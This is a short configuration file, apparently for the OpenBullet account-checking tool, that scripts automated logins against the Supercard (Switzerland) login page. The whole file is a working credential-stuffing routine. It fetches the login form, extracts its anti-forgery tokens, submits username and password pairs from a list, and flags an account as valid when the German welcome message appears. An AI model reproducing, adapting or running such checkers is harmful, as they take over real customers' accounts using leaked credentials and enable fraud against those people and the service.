[SETTINGS]
{
  "Name": "Supercard CH",
  "SuggestedBots": 1,
  "LastModified": "2018-06-10T13:51:50.7624503+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_MAIN_PAGE REQUEST GET "https://login.supercard.ch/cas/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_LT PARSE "<SOURCE>" CSS "[name=lt]" "value" 0 -> VAR "LT" "" "" 
#PARSE_EXEC PARSE "<SOURCE>" CSS "[name=execution]" "value" 0 -> VAR "EXEC" "" "" 
FUNCTION URLEncode "<EXEC>" -> VAR "encode" 
#LOGIN REQUEST POST "https://login.supercard.ch/cas/login?service=http://www.supercard.ch/" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&lt=<LT>&execution=<encode>&_eventId=submit&submit=Anmelden" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE: it" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "origin: https://login.supercard.ch" 
  HEADER "referer: https://login.supercard.ch/cas/login" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Herzlich willkommen bei Supercard" 
